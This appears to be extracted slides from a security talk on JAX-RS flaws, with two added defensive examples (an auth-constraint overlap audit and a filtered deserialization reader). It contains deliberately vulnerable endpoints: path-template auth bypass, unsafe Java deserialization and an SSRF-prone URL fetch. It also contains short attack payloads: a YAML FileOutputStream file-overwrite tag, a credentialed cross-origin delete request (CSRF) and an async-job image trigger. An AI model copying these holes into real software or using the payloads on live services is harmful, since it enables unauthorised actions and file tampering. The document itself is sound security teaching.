![Page 1: PowerPoint Presentation - TROOPERS20 · PowerPoint Presentation Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/1.jpg)
```java
@ApplicationPath("/")
public class DummyApp extends Application {
}
```
```java
@Path("/rest")
@Produces(MediaType.TEXT_PLAIN)
public class DummyResource {
    @GET
    @Path("/echo1")
    public Response queryparam(@QueryParam("value") String param) {...}

    @GET
    @Path("/echo2")
    public Response headerparam(@HeaderParam("X-Echo") String param) {...}

    @POST
    @Path("/echo3")
    public Response formparam(@FormParam("value") String param) {...}

    @POST
    @Path("/echo4")
    public Response entityparam(String param) {...}
}
```
Slide callouts for the `DummyResource` class above:

- `@Path("/rest")` on the class: relative URI path for the resource
- `@Produces(MediaType.TEXT_PLAIN)`: MIME media type
- `queryparam`, `headerparam`, `formparam`, `entityparam`: resource methods
- `@GET`, `@POST`: HTTP method annotations (GET, POST, PUT, DELETE, etc.)
- `@Path("/echo1")` through `@Path("/echo4")` on the methods: relative URI path for methods
- `@QueryParam("value")`: extracted from the URI query parameter `value`
- `@HeaderParam("X-Echo")`: extracted from the `X-Echo` header
- `@FormParam("value")`: extracted from the body parameter `value`
- `String param` in `entityparam`: entity parameter (without annotation)
```xml
<web-app>
  …
  <servlet>
    <servlet-name>RESTEasy JSAPI</servlet-name>
    <servlet-class>org.jboss.resteasy.jsapi.JSAPIServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>RESTEasy JSAPI</servlet-name>
    <url-pattern>/unsafe-jaxrs/resteasy/rest-js</url-pattern>
  </servlet-mapping>
  …
</web-app>
```
```html
<script src="http://127.0.0.1:8080/unsafe-jaxrs/resteasy/rest-js" type="text/javascript"></script>
<script>
  var resMethods = Object.getOwnPropertyNames(PoC_resource);
  for (var i = 0; i < resMethods.length; i++) {
    try {
      PoC_resource[resMethods[i]].call(PoC_resource);
    } catch (err) { ; }
  }
</script>
```
```java
@Path("/rest/echo/{name:.+}")
public class PublicResource {
    @GET
    public Response somemethod(@PathParam("name") String name) {
        return Response.status(200).entity("Public").build();
    }
}
```
```java
@Path("/rest/{name}/show/{id:\\d+}")
public class PrivateResource {
    @GET
    public Response somemethod(@PathParam("name") String name,
                               @PathParam("id") String id) {
        return Response.status(200).entity("Private").build();
    }
}
```
```xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>app</web-resource-name>
      <url-pattern>/rest/echo/*</url-pattern>
    </web-resource-collection>
  </security-constraint>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>app</web-resource-name>
      <url-pattern>/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>AuthorizedUser</role-name>
    </auth-constraint>
  </security-constraint>
  <login-config>
    <auth-method>BASIC</auth-method>
    <realm-name>The Restricted Zone</realm-name>
  </login-config>
  …
</web-app>
```
Slide callouts for the `web.xml` above:

- first `security-constraint` (`/rest/echo/*`, no `auth-constraint`): doesn't require auth
- second `security-constraint` (`/*`, role `AuthorizedUser`): requires auth
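An added audit sketch, not part of the original slides: it checks which class-level `@Path` templates can match a path under a `url-pattern` that carries no `auth-constraint`, and prints each template's literal-character count, the primary key JAX-RS uses to rank matching root resources. `ProfileResource` is a constructed negative case; the sketch assumes `@ApplicationPath("/")`, path-prefix or exact `url-pattern`s only, and variable regexes without braces.

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class ConstraintOverlapAudit {

    // Matches {name} or {name:regex}; assumes the regex contains no braces.
    private static final Pattern VAR =
            Pattern.compile("\\{\\s*\\w+\\s*(?::([^{}]+))?\\}");

    // Translate a JAX-RS URI template into a java.util.regex pattern.
    static Pattern toRegex(String template) {
        StringBuilder re = new StringBuilder();
        Matcher m = VAR.matcher(template);
        int last = 0;
        while (m.find()) {
            re.append(Pattern.quote(template.substring(last, m.start())));
            String custom = m.group(1);
            // A variable without an explicit regex matches one path segment.
            re.append('(').append(custom != null ? custom.trim() : "[^/]+").append(')');
            last = m.end();
        }
        re.append(Pattern.quote(template.substring(last)));
        return Pattern.compile(re.toString());
    }

    // Characters of the template that are not part of a {variable}.
    static int literalChars(String template) {
        return VAR.matcher(template).replaceAll("").length();
    }

    // True if some request path covered by the servlet url-pattern can also
    // be matched by the JAX-RS template.
    static boolean reachableUnder(String template, String urlPattern) {
        Pattern re = toRegex(template);
        if (!urlPattern.endsWith("/*")) {
            return re.matcher(urlPattern).matches();      // exact mapping
        }
        String prefix = urlPattern.substring(0, urlPattern.length() - 2);
        if (re.matcher(prefix).matches()) {
            return true;                                  // "/a/*" also covers "/a"
        }
        // Partial match: the regex accepted all of "prefix/" and only failed
        // because the input ended, so a longer path under the prefix can match.
        Matcher m = re.matcher(prefix + "/");
        return m.matches() || m.hitEnd();
    }

    public static void main(String[] args) {
        // Class-level @Path templates. The first two come from the slides,
        // the third is constructed for contrast.
        Map<String, String> resources = new LinkedHashMap<>();
        resources.put("PublicResource", "/rest/echo/{name:.+}");
        resources.put("PrivateResource", "/rest/{name}/show/{id:\\d+}");
        resources.put("ProfileResource", "/rest/profile/{id}");

        // url-pattern of the security-constraint that has no auth-constraint.
        String openPattern = "/rest/echo/*";

        for (Map.Entry<String, String> e : resources.entrySet()) {
            if (reachableUnder(e.getValue(), openPattern)) {
                System.out.printf("%-16s %-30s reachable under %s (literal chars: %d)%n",
                        e.getKey(), e.getValue(), openPattern, literalChars(e.getValue()));
            }
        }
    }
}
```

Any resource listed other than the one the open pattern was written for can receive requests that the container does not subject to the `auth-constraint`; where two listed templates match the same request, the one with more literal characters is selected.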
```java
@Provider
@Produces("*/*")
@Consumes("*/*")
public class SerializableProvider implements MessageBodyReader {
    public boolean isReadable(Class<?> type, Type genericType,
                              Annotation[] annotations, MediaType mediaType) {
        // Implementation
    }

    public Serializable readFrom(Class<Serializable> type,
                                 Type genericType, Annotation[] annotations,
                                 MediaType mediaType, MultivaluedMap<String, String> httpHeaders,
                                 InputStream entityStream) throws Exception {
        // Implementation
    }
}
```
```java
@ApplicationPath("/")
public class PoC_app extends ResourceConfig {
    public PoC_app() {
    }
}
```
```java
public boolean isReadable(Class<?> type, Type genericType,
                          Annotation[] annotations,
                          MediaType mediaType)
{
    return Serializable.class.isAssignableFrom(type) &&
        APPLICATION_SERIALIZABLE_TYPE.getType().equals(mediaType.getType()) &&
        APPLICATION_SERIALIZABLE_TYPE.getSubtype().equals(mediaType.getSubtype());
}
```
```java
public Serializable readFrom(Class<Serializable> type, Type genericType,
                             Annotation[] annotations, MediaType mediaType,
                             MultivaluedMap<String, String> httpHeaders,
                             InputStream entityStream) throws Exception
{
    BufferedInputStream bis = new BufferedInputStream(entityStream);
    ObjectInputStream ois = new ObjectInputStream(bis);
    try {
        return Serializable.class.cast(ois.readObject());
    } catch (ClassNotFoundException e) {
        throw new WebApplicationException(e);
    }
}
```
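The `readFrom` above passes the request body to `ObjectInputStream.readObject()` and casts only afterwards, so every class named in the stream is instantiated before the cast can fail. The following added example (not from the original slides or from any framework's code) performs the same read with a JDK `ObjectInputFilter` (Java 9+) that allow-lists the expected entity class. `Pair` is a constructed stand-in for the slide's entity class, `HashMap` stands in for any unexpected type, and the depth and reference limits are illustrative values.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.HashMap;
import java.util.Set;

public class FilteredSerializableReader {

    // Constructed stand-in for the entity class used by the resource method.
    static class Pair implements Serializable {
        private static final long serialVersionUID = 1L;
        private final String p1;
        private final String p2;
        Pair(String p1, String p2) { this.p1 = p1; this.p2 = p2; }
        String getP1() { return p1; }
        String getP2() { return p2; }
    }

    // Hardened counterpart of readFrom(): the filter is consulted while the
    // stream is parsed, so a class outside the allow-list is rejected before
    // an instance of it is created.
    static <T extends Serializable> T readEntity(Class<T> type,
                                                 InputStream entityStream,
                                                 Set<Class<?>> allowed)
            throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(entityStream);
        ois.setObjectInputFilter(info -> {
            // Illustrative resource limits on graph depth, back references
            // and array size (arrayLength() is -1 for non-arrays).
            if (info.depth() > 8 || info.references() > 64 || info.arrayLength() > 1024) {
                return ObjectInputFilter.Status.REJECTED;
            }
            Class<?> c = info.serialClass();
            if (c == null) {
                // Limit-only callback, no class to judge.
                return ObjectInputFilter.Status.UNDECIDED;
            }
            return allowed.contains(c)
                    ? ObjectInputFilter.Status.ALLOWED
                    : ObjectInputFilter.Status.REJECTED;
        });
        // The stream is left open: the JAX-RS runtime owns the entity stream.
        return type.cast(ois.readObject());
    }

    // Helper that builds the constructed sample inputs below.
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        Set<Class<?>> allowed = Set.of(Pair.class, String.class);

        // Expected entity type: accepted.
        byte[] good = serialize(new Pair("foo", "bar"));
        Pair p = readEntity(Pair.class, new ByteArrayInputStream(good), allowed);
        System.out.println("accepted: " + p.getP1() + p.getP2());

        // Any other serializable type in the body: rejected by the filter,
        // before the cast to Pair is ever reached.
        byte[] unexpected = serialize(new HashMap<String, String>());
        try {
            readEntity(Pair.class, new ByteArrayInputStream(unexpected), allowed);
            System.out.println("unexpected type was deserialized");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```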
```java
@POST
@Path("/concat")
@Produces(MediaType.APPLICATION_JSON)
@Consumes({"*/*"})
public Map<String, String> doConcat(Pair pair) {
    HashMap<String, String> result = new HashMap<String, String>();
    result.put("Result", pair.getP1() + pair.getDelimiter() + pair.getP2());
    return result;
}
```
```java
public class Pair implements Serializable {
    private static final long serialVersionUID = 1L;
    private String P1;
    private String P2;
    ...
}
```
```java
public boolean isReadable(Class<?> type, Type genericType,
                          Annotation[] annotations, MediaType mediaType) {
    return true;
}
```
```java
String yaml = "--- !!java.io.FileOutputStream [/tmp/overwrite]";
Object o = new Yaml().load(yaml);
```
```yaml
--- !!java.io.FileOutputStream [/tmp/overwrite]
```

```java
@POST
@Path("/concat/1")
@Produces(MediaType.TEXT_PLAIN)
public Response doConcat1(Pair p)
{
    return Response.status(200).entity(p.getP1() + p.getP2()).build();
}
```
```yaml
list: [!!java.io.FileOutputStream [/tmp/overwrite]]
```

```java
@POST
@Path("/concat/array")
@Produces(MediaType.TEXT_PLAIN)
public Response doConcat2(ArrayList<Pair> p) {
    return Response.status(200).entity(p.get(0).getP1() +
        p.get(0).getP2()).build();
}
```
```java
public boolean isReadable(final Class<?> type, final Type genericType,
                          final Annotation[] annotations,
                          final MediaType mediaType)
{
    return true;
}
```
```java
@POST
@Path("/concat")
@Produces(MediaType.APPLICATION_JSON)
@Consumes({"*/*"})
public Map<String, String> doConcat(Pair pair)
{
    HashMap<String, String> result = new HashMap<String, String>();
    result.put("Result", pair.getP1() + pair.getDelimiter() + pair.getP2());
    return result;
}
```
http://cxf.apache.org/security-advisories.data/CVE-2016-8739.txt.asc
```java
public boolean isReadable(Class<?> type, Type genericType,
                          Annotation[] annotations,
                          MediaType mediaType)
{
    return !String.class.equals(type) && TypeConverter.isConvertable(type);
}
```
```java
@POST
@Path("/profile/delete")
@Produces(MediaType.APPLICATION_JSON)
public Response deleteProfile(Profile profile) {
    String result = "{\"status\":\"" + profile.delete() + "\"}";
    return Response.status(200).entity(result).build();
}
```
```java
public class Profile {
    private String DisplayName;
    private String Email;
    private String uid;

    public Profile() {}

    public Profile(String uid) {
        this.uid = uid;
    }

    public String delete() {
        // SOME LOGIC TO FIND PROFILE BY UID AND DELETE IT
        return "Deleted";
    }
}
```
```html
<script>
  var request = new XMLHttpRequest();
  var data = '12345';
  request.open('POST',
    'http://localhost:8080/unsafe-jaxrs/profile/delete',
    true);
  request.withCredentials = true;
  request.setRequestHeader("Content-type", "text/plain");
  request.send(data);
</script>
```
```java
public boolean isReadable(Class<?> type, Type genericType,
                          Annotation[] annotations,
                          MediaType mediaType)
{
    return type.equals(Map.class) && genericType != null
        && genericType instanceof ParameterizedType;
}
```
```java
@POST
@Path("/multipart")
@Consumes(MediaType.MULTIPART_FORM_DATA)
public Response doMultipart(Map<String,String[]> map) {
    return Response.ok().build();
}
```
```java
@GET
@Path("/ssrf/pwn")
@Produces(MediaType.APPLICATION_JSON)
public Response getFromRemoteApp(@QueryParam("url") String url) {
    Client client = ClientBuilder.newBuilder().build();
    WebTarget target = client.target(url);
    Response response = target.request().get();
    ArrayList value = response.readEntity(ArrayList.class);
    response.close();
    return Response.status(200).entity(value).build();
}
```
```xml
<context-param>
  <param-name>resteasy.async.job.service.enabled</param-name>
  <param-value>true</param-value>
</context-param>
```
```java
@GET
@Path("/profile/me")
@Produces(MediaType.APPLICATION_JSON)
public Profile doShowProfile()
{
    return new Profile();
}
```
```html
<img src="http://127.0.0.1:8080/unsafe-jaxrs/profile/me?asynch=true" />
```
```java
String id = "" + System.currentTimeMillis() + "-" +
    counter.incrementAndGet();
```